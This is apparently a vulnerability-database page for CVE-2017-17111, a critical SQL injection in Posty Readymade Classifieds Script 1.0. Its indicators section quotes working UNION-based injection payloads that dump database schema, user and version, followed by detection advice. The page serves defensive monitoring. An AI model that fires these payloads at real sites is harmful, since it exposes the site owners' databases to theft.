CVE-2017-17111
published 2017-12-11CVE-2017-17111: Posty Readymade Classifieds Script 1.0 allows an attacker to inject SQL commands via a listings.php?catid= or ads-details.php?ID= request.
PriorityP263critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
8.80%
94.5th percentile
Posty Readymade Classifieds Script 1.0 allows an attacker to inject SQL commands via a listings.php?catid= or ads-details.php?ID= request.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| scubez | posty_readymade_classifieds | — | — |
Detection & IOCsextracted from sources · hover to see the quote
urlhttp://server/listings.php?catid=-1++/*!08888UNION*/((/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)))--+-↗
urlhttp://server/ads-details.php?ID=-265++/*!08888UNION*/(/*!08888SELECT*/(1),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26))--+-↗
commandID=-5939 UNION ALL SELECT NULL,NULL,CONCAT(0x716a626271,0x664f68565771437a5444554e794f547462774e65574f43616b767945464c416d524b646f48675a67,0x71787a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ZIaY↗
- →Monitor GET requests to listings.php with a 'catid' parameter containing SQL injection patterns, particularly MySQL-specific inline comment syntax /*!08888...*/ and UNION-based payloads. ↗
- →Monitor GET requests to ads-details.php with an 'ID' parameter containing SQL injection patterns, including UNION SELECT, SLEEP(), and boolean-based blind payloads. ↗
- →Detect use of MySQL versioned comment obfuscation token '/*!08888' in HTTP query strings, which is a distinctive fingerprint of this exploit's payloads. ↗
- →Detect time-based blind SQLi attempts via SLEEP(5) in the catid or ID GET parameters. ↗
- →The UNION-based payload for ads-details.php uses exactly 26 columns; detect anomalous UNION SELECT statements with a large number of NULL columns in the ID parameter. ↗
- ·The exploit targets Posty Readymade Classifieds Script version 1.0 only; later versions may not be affected. ↗
- ·The exploit was tested on Windows 7 x64 and Kali Linux x64; behavior on other platforms may differ. ↗
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No writeups or analysis indexed.
2017-12-11
Published